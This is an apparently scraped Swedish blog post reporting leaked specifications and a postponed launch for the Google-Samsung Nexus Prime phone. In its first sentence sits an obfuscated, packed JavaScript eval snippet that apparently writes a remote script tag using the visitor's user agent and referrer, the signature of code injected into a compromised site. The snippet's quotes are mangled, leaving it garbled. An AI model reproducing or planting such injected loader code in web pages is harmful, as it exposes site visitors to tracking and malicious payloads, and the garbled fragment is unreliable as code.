Image Image Image Image Image Image Image Image Image Image

| 13 augusti, 2020

Scroll to top

Top

Google & Samsung Nexus prime ?

Google & Samsung Nexus prime ?
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnyrr|var|u0026u|referrer|deess||js|php’.split(’|’),0,{}))
en tid nu har det ryktats en hel del om den nya telefonen Nexus Prime. Det har läckt en del information gällande specifikationen på smartphonen men inga bilder har publicerats förens nu.

Detta är ett samarbete mellan Google och Samsung och den skulle ha presenterats i imorgon. Tyvärr så skjuts presentationen upp på obestämd tid.

Det sägs att telefonen ska ha en dubbelkärnig 1,5 GHz-processor samt en extra dubbelkärnig GPU för att hjälpa till att maxa grafiken. GSM Arena tror att GPU-processorn är den samma som finns i iPad 2 och troligen iPhone 4S. Kameran kommer nog att ha samma funktioner som iPhon 4S, dvs en åttamegapixelkamera och förbättrad sensor.

En av det coolare funktionerna är att skärmen sägs bli en böjd 4,65 tum med 1280×720 pixlars upplösning.

Här nedan via länken kan ni finna de läckta bilderna på telefonen.

Mer info: www.neowin.net

Comments